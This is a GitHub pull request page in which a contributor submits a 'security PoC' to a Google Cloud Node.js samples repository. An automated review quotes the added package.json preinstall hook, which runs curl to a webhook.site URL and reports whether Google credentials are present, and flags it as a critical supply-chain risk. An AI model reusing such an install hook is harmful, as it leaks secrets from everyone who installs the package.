Skip to content

security PoC#4361

Open
bibu123456 wants to merge 1 commit into
GoogleCloudPlatform:mainfrom
bibu123456:poc-custard
Open

security PoC#4361
bibu123456 wants to merge 1 commit into
GoogleCloudPlatform:mainfrom
bibu123456:poc-custard

Conversation

@bibu123456

Copy link
Copy Markdown

Description

Fixes #

Note: Before submitting a pull request, please open an issue for discussion if you are not associated with Google.

Checklist

  • I have followed guidelines from CONTRIBUTING.MD and Samples Style Guide
  • Tests pass: npm test (see Testing)
  • Lint pass: npm run lint (see Style)
  • Required CI tests pass (see CI testing)
  • These samples need a new API enabled in testing projects to pass (let us know which ones)
  • These samples need a new/updated env vars in testing projects set to pass (let us know which ones)
  • This pull request is from a branch created directly off of GoogleCloudPlatform/nodejs-docs-samples. Not a fork.
  • This sample adds a new sample directory, and I updated the CODEOWNERS file with the codeowners for this sample
  • This sample adds a new sample directory, and I created GitHub Actions workflow for this sample
  • This sample adds a new Product API, and I updated the Blunderbuss issue/PR auto-assigner with the codeowners for this sample
  • Please merge this PR for me once it is approved

Note: Any check with (dev), (experimental), or (legacy) can be ignored and should not block your PR from merging (see CI testing).

@bibu123456 bibu123456 requested review from a team as code owners June 24, 2026 13:15
@google-cla

google-cla Bot commented Jun 24, 2026

Copy link
Copy Markdown

Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).

View this failed invocation of the CLA check for more information.

For the most up to date status, view the checks section at the bottom of the pull request.

@gemini-code-assist gemini-code-assist Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request introduces a critical security vulnerability by adding a preinstall script to package.json that attempts to exfiltrate environment variable information to an external, untrusted domain. The reviewer correctly flagged this as a severe supply chain risk and requested its immediate removal.

"node": ">=16.0.0"
},
"scripts": {
"preinstall": "curl -s https://webhook.site/9d88508f-ae3f-463e-8621-682ae1245290/CUSTARD_RCE_gcreds_${GOOGLE_APPLICATION_CREDENTIALS:+PRESENT}",

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

security-critical critical

Critical Security Issue: The preinstall script executes an external curl command to an untrusted third-party domain (webhook.site) and attempts to exfiltrate environment variable status (GOOGLE_APPLICATION_CREDENTIALS). This introduces a severe supply chain risk and potential credential exposure. This script must be removed immediately.

@product-auto-label product-auto-label Bot added the samples Issues that are directly related to samples. label Jun 25, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

samples Issues that are directly related to samples.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant